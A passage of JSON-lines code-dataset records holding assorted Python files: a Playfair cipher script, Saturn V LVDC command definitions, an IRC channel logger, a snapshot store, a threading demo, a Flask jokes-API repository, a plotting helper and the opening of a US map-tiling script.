sys.argv[sys.argv.index('-k')+1].upper()\n\n\tif mode == 'decrypt':\n\t\tprint(playfairDecrypt(CipherText(text), key))\n\n\tif mode == 'encrypt':\n\t\tprint(playfairEncrypt(text, key))\n\ndef playfairEncrypt(message, keyword):\n\tres = ''\n\tgrid = PlayfairGrid(keyword)\n\tfor digraph in CipherText(message).generatePlayfairDigraphs():\n\t\tres += grid.encodeDigraph(digraph)\n\treturn res\n\ndef playfairDecrypt(cipher, keyword):\n\tres = ''\n\tgrid = PlayfairGrid(keyword)\n\tfor digraph in CipherText(cipher).generatePlayfairDigraphs():\n\t\tres += grid.decodeDigraph(digraph)\n\n\treturn res.lower()\n\n\n\nif __name__ == \"__main__\":\n\tmain()\t\t","repo_name":"dylansturg/WebProjects","sub_path":"Crypto/playfair/playfaircipher.py","file_name":"playfaircipher.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22444291132","text":"scaleTBD = -1000\n\ndcsTypes = {\n \"ANTENNA TO HIGH GAIN\": {\n \"name\": \"ANTENNA TO HIGH GAIN\",\n \"description\": \"Switch to PCM and CCS high-gain antennas\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"ANTENNA TO LOW GAIN\": {\n \"name\": \"ANTENNA TO LOW GAIN\",\n \"description\": \"Switch to PCM and CCS low-gain antennas\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"ANTENNA TO OMNI\": {\n \"name\": \"ANTENNA TO OMNI\",\n \"description\": \"Switch to PCM and CCS omni antennas\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"COARSE TIME BASE UPDATE\": {\n \"name\": \"COARSE TIME BASE UPDATE\",\n \"description\": \"The time-base time is advanced or retarded by a selected amount\",\n \"dataValues\": [\"DELTA T\"],\n \"dataUnits\": [\"SECONDS\"],\n \"dataDescriptions\": [\n \"Delta-time in current time base, in range -3968 to +3968, rounded to nearest 128-second multiple\"\n ],\n \"numDataWords\": 1,\n },\n \"EXECUTE ALTERNATE SEQUENCE\": {\n # AS-513 D.S800 \n # MS 26 bits = requested time for alternate sequence\n # LS 4 bits = indicator bits\n \"name\": \"EXECUTE ALTERNATE SEQUENCE\",\n \"description\": \"Initiate alternate sequence\",\n \"dataValues\": [\"TIME\", \"SEQUENCE\"],\n \"dataScales\": [15, -1000],\n \"dataUnits\": [\"SECONDS\", \"\"],\n \"dataDescriptions\": [\n \"Requested time (seconds) at which to activate the alternate sequence\",\n \"Specifies the requested alternate sequence (0-15); for AS-513, 1 = sequence 4A and 2 = sequence 4B\"\n ],\n \"numDataWords\": 5\n },\n \"EXECUTE GENERALIZED MANEUVER\": {\n \"name\": \"EXECUTE GENERALIZED MANEUVER\",\n \"description\": \"Execute a maneuver that wasn't prepreprogrammed\",\n \"dataValues\": [\"TIME\", \"TYPE\", \"PITCH\", \"YAW\", \"ROLL\"],\n \"dataScales\": [15, -1000, 0, 0, 0],\n \"dataUnits\": [\"SECONDS\", \"\", \"PIRADS\", \"PIRADS\", \"PIRADS\"],\n \"dataDescriptions\": [\n \"Time (seconds) at thich to perform the maneuver\",\n \"Type of maneuver: literal HOLD (hold inertial attitude) or TRACK (track local reference)\",\n \"Desired pitch in PIRADs\",\n \"Desired yaw in PIRADs\",\n \"Desired roll in PIRADs\"\n ],\n \"numDataWords\": 20\n },\n \"EXECUTE MANEUVER A\": {\n \"name\": \"EXECUTE MANEUVER A\",\n \"description\": \"Initiates a maneuver to local horizontal in a retrograde position\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"EXECUTE MANEUVER B\": {\n \"name\": \"EXECUTE MANEUVER B\",\n \"description\": \"TBD\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"FINE TIME BASE UPDATE\": { # Same as TIME BASE UPDATE\n \"name\": \"FINE TIME BASE UPDATE\",\n \"description\": \"The time-base time is advanced or retarded by a selected amount\",\n \"dataValues\": [\"DELTA T\"],\n \"dataUnits\": [\"SECONDS\"],\n \"dataDescriptions\": [\n \"Delta-time in current time base, in range -124 to +124, rounded to nearest 4-second multiple\"\n ],\n \"numDataWords\": 1,\n },\n \"GENERALIZED SWITCH SELECTOR\": {\n \"name\": \"GENERALIZED SWITCH SELECTOR\",\n \"description\": \"Issue a switch-selector function at the first opportunity\",\n \"dataValues\": [\"STAGE\", \"ADDRESS\"],\n \"dataDescriptions\": [\n \"Literally, the string 'IU' or 'SIVB' without quotation marks\",\n \"Octal address 000-177\"\n ],\n \"numDataWords\": 2\n },\n \"INHIBIT MANEUVER\": {\n \"name\": \"INHIBIT MANEUVER\",\n \"description\": \"Inhibit coast phase attitude maneuver\",\n \"dataValues\": [], \n \"numDataWords\": 0\n },\n \"INHIBIT WATER VALVE LOGIC\": {\n \"name\": \"INHIBIT WATER VALVE LOGIC\",\n \"description\": \"Inhibit water valve from changing position\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"LADDER MAGNITUDE LIMIT\": {\n \"name\": \"LADDER MAGNITUDE LIMIT\",\n \"description\": \"Sets magnitude limit on pitch/roll/yaw D/A \\\"ladders\\\"\",\n \"dataValues\": [\"ANGLE\"],\n \"dataUnits\": [\"DEGREES\"],\n \"dataDescriptions\": [\"Decimal degrees, 0 through 15.3\"],\n \"numDataWords\": 1\n },\n \"MEMORY DUMP\": {\n \"name\": \"MEMORY DUMP\",\n \"description\": \"The contents of the specified contiguous memory block are telemetered.\",\n \"dataValues\": [\"DM0\", \"DS0\", \"LOC0\", \"DM1\", \"DS1\", \"LOC1\"],\n \"dataDescriptions\": [\n \"Starting module number, one of 0, 2, 4, or 6\",\n \"Starting sector number, octal 00-17\",\n \"Starting offset within sector, octal 000-377\",\n \"Ending module number, one of 0, 2, 4, or 6\",\n \"Ending sector number, octal 00-17\",\n \"Ending offset within sector, octal 000-377\"\n ],\n \"numDataWords\": 6\n },\n \"NAVIGATION UPDATE\": {\n \"name\": \"NAVIGATION UPDATE\",\n \"simple\": True,\n \"description\": \"Re-initialize the navigation state vector at a specified time\",\n \"dataValues\": [\"ZDOT\", \"XDOT\", \"YDOT\", \"Z\", \"X\", \"Y\", \"T\"],\n \"dataScales\": [14, 14, 14, 23, 23, 23, 15],\n \"dataUnits\": [\"METERS/SECOND\", \"METERS/SECOND\", \"METERS/SECOND\", \"METERS\", \"METERS\", \"METERS\", \"SECONDS\"],\n \"dataDescriptions\": [\n \"Inertial velocity along Z axis in fixed-space coordinate system\",\n \"Inertial velocity along X axis in fixed-space coordinate system\",\n \"Inertial velocity along Y axis in fixed-space coordinate system\",\n \"Position along Z axis in fixed-space coordinate system\",\n \"Position along X axis in fixed-space coordinate system\",\n \"Position along Y axis in fixed-space coordinate system\",\n \"Time at which the adjustment takes effect\"\n ],\n \"numDataWords\": 35\n },\n \"RETURN TO NOMINAL TIMELINE\": {\n \"name\": \"RETURN TO NOMINAL TIMELINE\",\n \"simple\": True,\n \"description\": \"Returns to the pre-programmed orbital attitude timeline in effect prior to DCS-initiated action having overridden it.\",\n \"dataValues\": [\"TRNTL\"],\n \"dataScales\": [15],\n \"dataUnits\": [\"SECONDS\"],\n \"dataDescriptions\": [\"Replacement time, in seconds\"],\n \"numDataWords\": 5\n },\n \"S-IVB/IU LUNAR IMPACT\": {\n \"name\": \"S-IVB/IU LUNAR IMPACT\",\n \"description\": \"Initiate maneuver to crash the S-IVB stage onto the moon\",\n \"dataValues\": [\"1ST & 2ND\", \"3RD & 4TH\", \"DELTA PITCH\", \"DELTA YAW\", \"DELTA ROLL\"],\n \"dataUnits\": [\"MINUTES\", \"SECONDS\", \"DEGREES\", \"DEGREES\", \"DEGREES\"],\n \"dataDescriptions\": [\n \"Time (minutes, 0-511) to issue 1st and 2nd lunar-impact switch-selector sequence\",\n \"Delay (seconds, 0-4095) before issuing 3rd and 4th lunar-impact switch-selector sequence\",\n \"Change in pitch, -31 to 31 integer degrees\",\n \"Change in yaw, -31 to 31 integer degrees\",\n \"Change in roll, -31 to 31 integer degrees\"\n ],\n \"numDataWords\": 7\n },\n \"SECTOR DUMP\": {\n \"name\": \"SECTOR DUMP\",\n \"description\": \"The contents of the specified memory sector(s) are telemetered\",\n \"dataValues\": [\"DM\", \"DS0\", \"DS1\"],\n \"dataDescriptions\": [\"Module number 0, 2, 4, or 6.\", \n \"Starting sector number 00-17 in octal.\",\n \"Ending sector number 00-17 in octal.\"],\n \"numDataWords\": 2\n },\n \"TARGET UPDATE\": { \n # AS-513 D.S670 (V.INCU, V.THNU, V.ECCU, V.NC3U, V.APDU, V.FU, D.VTRP)\n \"name\": \"TARGET UPDATE\",\n \"simple\": True,\n \"description\": \"Replace targeting quantities for second S-IVB burn\",\n \"dataValues\": [\"INCLIN.\", \"DEC. NODE\", \"ECC.\", \n \"TWICE ORB. VEL.\", \n \"PER. TO DEC.\", \"TRUE ANOM.\", \"TIME LEFT\"],\n \"dataScales\": [0, 0, 0, 26, 0, 0, 15],\n \"dataUnits\": [\"PIRADS\", \"PIRADS\", \"\", \"METER**2/SECONDS**2\", \"PIRADS\", \"PIRADS\", \"SECONDS\"],\n \"dataDescriptions\": [\n \"Inclination angle in PIRADs\",\n \"Descending node in PIRADs\",\n \"Eccentricity\",\n \"Twice orbital energy\",\n \"Angle from perigee to descending node in PIRADs\",\n \"True anomaly in PIRADs\",\n \"Time remaining in time base prior to burn, in seconds\"\n ],\n \"numDataWords\": 35\n },\n \"TD & E ENABLE\": {\n \"name\": \"TD & E ENABLE\",\n \"description\": \"Inhibits TLI so that Transposition, Docking, and Ejection can be accomplished in Earth orbit.\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"TELEMETER SINGLE LOCATION\": {\n \"name\": \"TELEMETER SINGLE LOCATION\",\n \"description\": \"The content of a single selected memory location is telemetered\",\n \"dataValues\": [\"DM\", \"DS\", \"LOC\"],\n \"dataDescriptions\": [\"Module number 0, 2, 4, or 6.\", \n \"Sector number 00-17 in octal.\",\n \"Address within sector, 000-377 in octal.\"],\n \"numDataWords\": 3\n },\n \"TERMINATE\": {\n \"name\": \"TERMINATE\",\n \"description\": \"Stop DCS processing and reset for a new command\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"TIME BASE 6D\": {\n \"name\": \"TIME BASE 6D\",\n \"description\": \"Initiates time base 6D, S-IVB ignition restart\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"TIME BASE 8 ENABLE\": {\n \"name\": \"TIME BASE 8 ENABLE\",\n \"description\": \"Initiates time base 8, the post-S-IVB-separation maneuver\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n \"TIME BASE UPDATE\": {\n \"name\": \"TIME BASE UPDATE\",\n \"description\": \"The time-base time is advanced or retarded by a selected amount\",\n \"dataValues\": [\"DELTA T\"],\n \"dataUnits\": [\"SECONDS\"],\n \"dataDescriptions\": [\n \"Delta-time in current time base, in range -124 to +124, rounded to nearest 4-second multiple\"\n ],\n \"numDataWords\": 1,\n },\n \"UPDATE MANEUVER\": {\n \"name\": \"UPDATE MANEUVER\",\n \"description\": \"Change the time for starting the coast phase maneuver.\",\n \"dataValues\": [],\n \"numDataWords\": 0\n },\n }\n\ndcsForAS512 = {\n 0o05: dcsTypes[\"INHIBIT MANEUVER\"],\n 0o10: dcsTypes[\"TIME BASE UPDATE\"],\n 0o11: dcsTypes[\"NAVIGATION UPDATE\"],\n 0o12: dcsTypes[\"GENERALIZED SWITCH SELECTOR\"],\n 0o13: dcsTypes[\"SECTOR DUMP\"],\n 0o14: dcsTypes[\"TELEMETER SINGLE LOCATION\"],\n 0o17: dcsTypes[\"TIME BASE 8 ENABLE\"],\n 0o20: dcsTypes[\"TERMINATE\"],\n 0o22: dcsTypes[\"UPDATE MANEUVER\"],\n 0o25: dcsTypes[\"TIME BASE 6D\"],\n 0o31: dcsTypes[\"TARGET UPDATE\"],\n 0o33: dcsTypes[\"EXECUTE MANEUVER A\"],\n 0o34: dcsTypes[\"EXECUTE MANEUVER B\"],\n #0o40: dcsTypes[\"INHIBIT MANEUVER\"],\n 0o41: dcsTypes[\"LADDER MAGNITUDE LIMIT\"],\n #0o43: dcsTypes[\"UPDATE MANEUVER\"],\n 0o45: dcsTypes[\"INHIBIT WATER VALVE LOGIC\"],\n 0o52: dcsTypes[\"S-IVB/IU LUNAR IMPACT\"],\n 0o53: dcsTypes[\"ANTENNA TO OMNI\"],\n 0o54: dcsTypes[\"ANTENNA TO LOW GAIN\"],\n 0o55: dcsTypes[\"ANTENNA TO HIGH GAIN\"],\n 0o60: dcsTypes[\"TD & E ENABLE\"]\n}\n\ndcsForAS513 = {\n 0o10: dcsTypes[\"FINE TIME BASE UPDATE\"],\n 0o11: dcsTypes[\"NAVIGATION UPDATE\"],\n 0o12: dcsTypes[\"GENERALIZED SWITCH SELECTOR\"],\n 0o13: dcsTypes[\"MEMORY DUMP\"],\n 0o20: dcsTypes[\"TERMINATE\"],\n 0o21: dcsTypes[\"EXECUTE ALTERNATE SEQUENCE\"],\n 0o35: dcsTypes[\"EXECUTE GENERALIZED MANEUVER\"],\n 0o36: dcsTypes[\"RETURN TO NOMINAL TIMELINE\"],\n 0o40: dcsTypes[\"COARSE TIME BASE UPDATE\"],\n 0o41: dcsTypes[\"LADDER MAGNITUDE LIMIT\"],\n 0o45: dcsTypes[\"INHIBIT WATER VALVE LOGIC\"]\n}\n","repo_name":"virtualagc/virtualagc","sub_path":"yaLVDC/dcsDefinitions.py","file_name":"dcsDefinitions.py","file_ext":"py","file_size_in_byte":11927,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"66"} +{"seq_id":"23386033087","text":"#!/usr/bin/env python3\n\n\n\"\"\"Channel Logger.\"\"\"\n\n\nimport datetime\nimport glob\nimport json\nimport logging\nimport os\nimport select\nimport socket\nimport ssl\nimport time\n\n_NAME = 'clog'\n_log = logging.getLogger(_NAME)\n\n\nclass _ctx:\n retry_delay = 1\n last_upkeep_time = 0\n\n\ndef main():\n \"\"\"Run client.\"\"\"\n log_fmt = ('%(asctime)s %(levelname)s %(filename)s:%(lineno)d '\n '%(funcName)s() %(message)s')\n logging.basicConfig(format=log_fmt, level=logging.INFO)\n\n # Read configuration.\n with open(f'{_NAME}.json', encoding='utf-8') as stream:\n config = json.load(stream)\n\n file_prefix = os.path.join(config['directory'], _NAME)\n _log.info('File prefix is %s', file_prefix)\n _fwrite(file_prefix, 'Started')\n\n while True:\n try:\n _run(config['host'], config['port'], config['tls'],\n config['nick'], config['password'], config['channels'],\n file_prefix, config['max_files'])\n except Exception:\n _log.exception('Client encountered error')\n _log.info('Reconnecting in %d s', _ctx.retry_delay)\n time.sleep(_ctx.retry_delay)\n _ctx.retry_delay = min(_ctx.retry_delay * 2, 3600)\n\n\ndef _run(host, port, tls, nick, password, channels, file_prefix, max_files):\n _log.info('Connecting ...')\n sock = socket.create_connection((host, port))\n if tls:\n tls_context = ssl.create_default_context()\n sock = tls_context.wrap_socket(sock, server_hostname=host)\n\n _log.info('Authenticating ...')\n _send(sock, f'PASS {password}')\n _send(sock, f'NICK {nick}')\n _send(sock, f'USER {nick} {nick} {host} :{nick}')\n\n _log.info('Joining channels ...')\n for channel in channels:\n _send(sock, f'JOIN {channel}')\n\n _log.info('Receiving messages ...')\n for line in _recv(sock):\n if line is not None:\n prefix, sender, command, middle, trailing = _parse_line(line)\n if command == 'PING':\n _send(sock, f'PONG :{trailing}')\n elif command in ['JOIN', 'PART', 'QUIT']:\n text = f'{sender} [{prefix}] {command} {middle}'\n if trailing is not None:\n text = f'{text} :{trailing}'\n _fwrite(file_prefix, text)\n elif command in ['PRIVMSG']:\n _log.info(\n '>> sender: %s; command: %s; middle: %s; trailing: %s',\n sender, command, middle, trailing)\n text = f'{sender} {command} {middle} :{trailing}'\n _fwrite(file_prefix, text)\n _ctx.retry_delay = 1\n if time.time() - _ctx.last_upkeep_time >= 3600:\n _upkeep(file_prefix, max_files)\n _ctx.last_upkeep_time = int(time.time())\n\n\ndef _fwrite(file_prefix, text):\n \"\"\"Write content to file and close the file.\"\"\"\n current_time = datetime.datetime.now(datetime.timezone.utc)\n fdate = current_time.strftime('%Y-%m-%d')\n ftime = current_time.strftime('%H:%M:%S')\n filename = f'{file_prefix}-{fdate}.txt'\n basedir = os.path.dirname(filename)\n if not os.path.isdir(basedir):\n os.makedirs(basedir)\n with open(filename, 'a', encoding='utf-8') as stream:\n stream.write(f'{fdate} {ftime} {text}\\n')\n\n\ndef _upkeep(file_prefix, max_files):\n filenames = sorted(glob.glob(file_prefix + '*'))\n total_files = len(filenames)\n surplus_files = total_files - max_files\n _log.info('Upkeep: max_files: %d; total_files: %d; surplus_files: %d',\n max_files, total_files, surplus_files)\n if surplus_files > 0:\n filenames = filenames[0:surplus_files]\n for filename in filenames:\n os.remove(filename)\n _log.info('Removed file %s', filename)\n\n\n# Protocol functions\ndef _recv(sock):\n buffer = ''\n while True:\n # Check if any data has been received.\n rlist, _, _ = select.select([sock], [], [], 1)\n if len(rlist) == 0:\n yield None\n continue\n\n # If data has been received, validate data length.\n data = sock.recv(1024)\n if len(data) == 0:\n message = 'Received zero-length payload from server'\n _log.error(message)\n raise ValueError(message)\n\n # If there is nonempty data, yield lines from it.\n buffer += data.decode(errors='replace')\n lines = buffer.split('\\r\\n')\n lines, buffer = lines[:-1], lines[-1]\n for line in lines:\n _log.info('recv: %s', line)\n yield line\n\n\ndef _send_message(sock, recipient, message):\n size = 400\n for line in message.splitlines():\n chunks = [line[i:i + size] for i in range(0, len(line), size)]\n for chunk in chunks:\n _send(sock, f'PRIVMSG {recipient} :{chunk}')\n\n\ndef _send(sock, message):\n sock.sendall(message.encode() + b'\\r\\n')\n _log.info('sent: %s', message)\n\n\ndef _parse_line(line):\n # RFC 1459 - 2.3.1\n # ::= [':' ] \n # ::= | [ '!' ] [ '@' ]\n # ::= { } | \n # ::= ' ' { ' ' }\n # ::= [ ':' | ]\n #\n # Example: :alice!Alice@user/alice PRIVMSG #hello :hello\n # Example: PING :foo.example.com\n if line[0] == ':':\n prefix, rest = line[1:].split(maxsplit=1)\n else:\n prefix, rest = None, line\n\n sender, command, middle, trailing = None, None, None, None\n\n if prefix:\n sender = prefix.split('!')[0]\n\n rest = rest.split(None, 1)\n command = rest[0].upper()\n\n if len(rest) == 2:\n params = rest[1]\n params = params.split(':', 1)\n middle = params[0].strip()\n if len(params) == 2:\n trailing = params[1].strip()\n\n return prefix, sender, command, middle, trailing\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"susam/clog","sub_path":"clog.py","file_name":"clog.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13539788432","text":"import threading\nfrom math import inf\nfrom collections import defaultdict\nimport bisect\n\n\nclass SnapshotContainer:\n \"\"\"\n Stores all business properties of an instance of view model\n\n For now similar to a dictionary, but might change to pickledb\n for debugging and testing the code.\n\n \"\"\"\n\n def __init__(self):\n self.d = defaultdict(list)\n self.store = dict()\n self.lock = threading.Lock()\n self._read_times = [(-inf, -inf)]\n\n # def get(self, key):\n # return self.store[key]\n #\n # def set(self, key, val):\n # self.store[key] = val\n\n def set_with_timestamp(self, key: str, val, timestamp: tuple=None) -> None:\n self.store[(timestamp, key)] = val\n self.d[key].append(timestamp)\n # Since the timestamps for all TimeMap.set operations\n # are strictly increasing\n # self.d[key].sort()\n\n def set(self, key: str, val, timestamp: tuple=None) -> None:\n self.store[(timestamp, key)] = val\n self.d[key].append(timestamp)\n # Since the timestamps for all TimeMap.set operations\n # are strictly increasing\n # self.d[key].sort()\n\n def has_previous(self, key: str):\n return len(self.d[key]) != 0\n\n def previous(self, key):\n ts = self.d[key][-1]\n return self.store[(ts, key)]\n\n def get(self, key: str, timestamp: tuple=None):\n if timestamp is None:\n return self.store[(timestamp, key)]\n\n idx = bisect.bisect_right(self.d[key], timestamp)\n if idx == 0:\n raise AttributeError\n else:\n ts = self.d[key][idx - 1]\n return self.store[(ts, key)]\n\n from math import inf\n\n def get_with_range(self, key, lo_excl=(-inf,-inf), hi_incl=(inf,inf)):\n \"\"\" NOTE: low is exclusive and high is inclusive (different from range)\n\n :param key:\n :param lo_excl:\n :param hi_incl:\n :return:\n \"\"\"\n start_idx = bisect.bisect_right(self.d[key], lo_excl)\n end_idx = bisect.bisect_right(self.d[key], hi_incl)\n for ts in self.d[key][start_idx:end_idx]:\n yield self.store[(ts, key)]\n","repo_name":"billyrrr/onto","sub_path":"onto/store/snapshot_container.py","file_name":"snapshot_container.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"66"} +{"seq_id":"21733079203","text":"import Zadania.Library.library as Library\nimport time\nimport datetime\nimport threading, queue\n#Library.TFIDF(\"../teksty/papk.txt\")\ndef log(message):\n now = datetime.datetime.now().strftime(\"%H:%M:%S\")\n print(\"%s %s\" % (now, message))\n\ndef oblicz(x):\n time.sleep(x)\n return x * x\n\n# Watki w puli oczekujace na zadania w kolejce ``kolejka_zadan``\nclass WatekOblicz(threading.Thread):\n def __init__(self, id, kolejka_zadan):\n threading.Thread.__init__(self, name=\"WatekOblicz-%d\" % (id,))\n self.kolejka_zadan = kolejka_zadan\n def run(self):\n while True:\n # watek sie blokuje w oczekiwaniu az cos trafi do kolejki\n req = self.kolejka_zadan.get()\n if req is None:\n # Nie ma nic wiecej do przetwarzania, wiec konczymy\n self.kolejka_zadan.task_done()\n break\n value, kolejka_rezultatow = req\n result = oblicz(value)\n log(\"%s %s -> %s\" % (self.getName(), value, result))\n kolejka_rezultatow.put(result)\n self.kolejka_zadan.task_done()\n\n\n\ndef threaded_sum(values, kolejka_zadan):\n nsum = 0.0\n kolejka_rezultatow = queue.Queue()\n for value in values:\n kolejka_zadan.put((value, kolejka_rezultatow))\n # pobieramy wyniki; kolejnosc odpowiedzi nie musi byc identyczna jak zadan!\n # uzycie \"_\" jest konwencja oznaczajaca \"wartosc tej zmiennej mnie nie interesuje\"\n for _ in values:\n nsum += kolejka_rezultatow.get()\n return nsum\n\ndef main():\n kolejka_zadan = queue.Queue()\n log(\"uruchamiam watek glowny\")\n # inicjalizujemy pule watkow z trzema watkami \"obliczeniowymi\"\n N_liczba_watkow = 3\n for i in range(N_liczba_watkow):\n WatekOblicz(i, kolejka_zadan).start()\n\n # wrzucamy 5 zadan\n result = threaded_sum( (4, 5, 3, 1.5, 2.2), kolejka_zadan )\n log(\"suma wynosi: %f\" % (result,))\n\n # wysylamy zadania zakonczenia przetwarzania do wszystkich watkow\n for i in range(N_liczba_watkow):\n kolejka_zadan.put(None)\n kolejka_zadan.join()\n log(\"koniec watku glownego.\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Peggaz/ZTP","sub_path":"Zadania/testRozwiazan/wąteki-test.py","file_name":"wąteki-test.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2930676050","text":"from Infrastructure.Entities.Core.Chistes import Chistes, chistes_schema\nfrom Infrastructure.Repositories.RepositoryBase import RepositoryBase\nfrom Infrastructure.Repositories.Complements.Utils import *\nfrom sqlalchemy import func\nimport datetime\nimport logging\nimport requests\nfrom settings import create_app, ENVIRONMENT_NAME\n\napp = create_app(ENVIRONMENT_NAME)\n\nWEAPI_CHUCKNORRIS = app.config[\"WEAPI_CHUCKNORRIS\"]\nWEAPI_JOKE = app.config[\"WEAPI_JOKE\"]\nVERIFY_SSL = app.config[\"VERIFY_SSL\"]\n\n\ndef get_info(i, name):\n if name == 'chuck':\n return {\n 'id': i['id'],\n 'descripcion' : i['value']\n }\n elif name == 'joke':\n return {\n 'id': i['id'],\n 'descripcion' : i['joke']\n }\n \ndef get_json(i,type_dict):\n \n summary_schema=chistes_schema(many=type_dict,only=(\n \"id\",\n \"descripcion\"\n )\n )\n \n return summary_schema.dump(i)\n\nclass ChistesRepository(RepositoryBase):\n db = None\n\n def __init__(self, db):\n self.db = db\n super().__init__(db, entity_base=Chistes, entity_name='Chistes')\n\n def get_api_chucknorris(self):\n try:\n url = WEAPI_CHUCKNORRIS + f'/random'\n headers = {'content-type': 'application/json'}\n \n r = requests.get(url, headers=headers, verify=VERIFY_SSL)\n if r.status_code not in (200, 201):\n return None\n re = r.json() \n row = get_info(re, name = 'chuck')\n return row\n except Exception as e:\n print(e)\n return None\n \n def get_api_joke(self):\n try:\n url = WEAPI_JOKE\n headers = {'Accept': 'application/json'}\n \n r = requests.get(url, headers=headers, verify=VERIFY_SSL)\n if r.status_code not in (200, 201):\n return None\n re = r.json()\n\n row = get_info(re, name = 'joke')\n return row\n except Exception as e:\n print(e)\n return None\n \n def get_by_id(self, id):\n try:\n query = self.session().query(Chistes).filter_by(id=id,vigente=True).first()\n if query is None:\n return None\n i = get_json(query,False)\n return i\n self.session().commit()\n except Exception as e:\n print(e)\n raise e\n self.session().rollback()\n raise\n finally:\n self.session().close()\n \n def get_all(self):\n try:\n query = self.session().query(Chistes).filter(Chistes.vigente == True).all()\n print(query)\n now = datetime.datetime.now()\n \n dt_string = now.date()\n print(now)\n logging.warning(str(now))\n logging.warning(str(now))\n return 'x'\n except Exception as e:\n return None\n self.session().rollback()\n raise\n finally:\n self.session().close()\n\n def get_by_element(self, id):\n try:\n return self.session().query(Chistes).filter_by(id=id, vigente=True).first()\n except Exception as e:\n raise e\n finally:\n self.session().close()\n\n def insert(self, item):\n try:\n self.session().add(item)\n self.session().commit()\n self.session().refresh(item)\n return get_json(item,False)\n except Exception as e:\n return None\n self.session().rollback()\n raise\n finally:\n self.session().close()\n\n def update(self, item):\n try:\n super().update(serialize(item),item.id)\n return True\n except Exception as e:\n print(e)\n self.session().rollback()\n raise\n finally:\n self.session().close()\n \n\n def disabled(self, id):\n try:\n self.session().query(self.entity_base).filter_by(id_lego_convivencia=id).update({'vigente': False})\n self.session().commit()\n return True\n except Exception as e:\n self.session().rollback()\n raise\n finally:\n self.session().close()\n","repo_name":"Luis-Santiago93/reto-back-python","sub_path":"Infrastructure/Repositories/ChistesRepository.py","file_name":"ChistesRepository.py","file_ext":"py","file_size_in_byte":4311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"1883636525","text":"def AreaLosses(mirror, blkFlag=True, printFigs=False):\n \"\"\"Plot AreaLosses of given mirror areas\"\"\"\n import matplotlib.pyplot as plt\n import numpy as np\n\n mir = mirror\n ### Plot Area Change in Losses over time\n mins = np.array(mir.r_t)/60.0;\n minEnd = max(mins)\n caseName = mir.simParams['fileName'][:-1]\n mini = 1\n\n fig, ax = plt.subplots()\n for area in mir.Area:\n ax.plot(mins, np.array(area.r_Losses)-area.r_Losses[0], linewidth=1.25,#linestyle=\":\",\n label= 'Area '+ str(area.Area)+', Norm: '+ str(int(area.r_Losses[0])))\n\n # Scale current axis.\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 1.05, box.height])\n\n # Put a legend to the right of the current axis\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n ax.set_title('Area Change in Losses\\n Case: ' + caseName)\n ax.set_xlim(0,minEnd)\n ax.set_ylabel('MW')\n ax.set_xlabel('Time [minutes]')\n\n #ax.legend(loc=0)\n ax.grid(True)\n fig.set_dpi(150)\n fig.set_size_inches(9/mini, 2.5)\n fig.tight_layout()\n if printFigs: plt.savefig(caseName+'AreaLosses'+'.pdf', dpi=300)\n plt.show(block=blkFlag)\n plt.pause(0.00001)","repo_name":"thadhaines/PSLTDSim","sub_path":"psltdsim/plot/AreaLosses.py","file_name":"AreaLosses.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"10340412716","text":"import math\nimport os\nimport random\nimport re\nimport subprocess\n\nfrom PIL import Image, ImageDraw\n\nimport bdgmath\n\n\"\"\"\ncollects city data from state protocol buffer files, \nsorts city by population,\ncreates a bridson blue noise map starting with cities, populating with point spacing 1.0\ngenerates tile polygons using voronoi\n\nreads: OSM/*-latest.osm.pbf\nwrites: \n map.png\n Tiles/voronoi.json\n Tiles/tile_*.json\n\"\"\"\n\n# from pyrosm import get_data\n\n# rainbow\n# west_limit = -123\n# east_limit = -122\n# north_limit = 48\n# south_limit = 47\n\n# washington\n# west_limit = -125\n# east_limit = -116\n# north_limit = 49\n# south_limit = 46\n\n# sea->bos\nwest_limit = -125\neast_limit = -65\nnorth_limit = 49\nsouth_limit = 40\n\n# continental US\nwest_limit = -125\neast_limit = -65\nnorth_limit = 49\nsouth_limit = 25\n\nstateToAbbrevDict = {\n \"Alabama\": \"AL\",\n \"Alaska\": \"AK\",\n \"Arizona\": \"AZ\",\n \"Arkansas\": \"AR\",\n \"California\": \"CA\",\n \"Colorado\": \"CO\",\n \"Connecticut\": \"CT\",\n \"Delaware\": \"DE\",\n \"Florida\": \"FL\",\n \"Georgia\": \"GA\",\n \"Hawaii\": \"HI\",\n \"Idaho\": \"ID\",\n \"Illinois\": \"IL\",\n \"Indiana\": \"IN\",\n \"Iowa\": \"IA\",\n \"Kansas\": \"KS\",\n \"Kentucky\": \"KY\",\n \"Louisiana\": \"LA\",\n \"Maine\": \"ME\",\n \"Maryland\": \"MD\",\n \"Massachusetts\": \"MA\",\n \"Michigan\": \"MI\",\n \"Minnesota\": \"MN\",\n \"Mississippi\": \"MS\",\n \"Missouri\": \"MO\",\n \"Montana\": \"MT\",\n \"Nebraska\": \"NE\",\n \"Nevada\": \"NV\",\n \"New Hampshire\": \"NH\",\n \"New Jersey\": 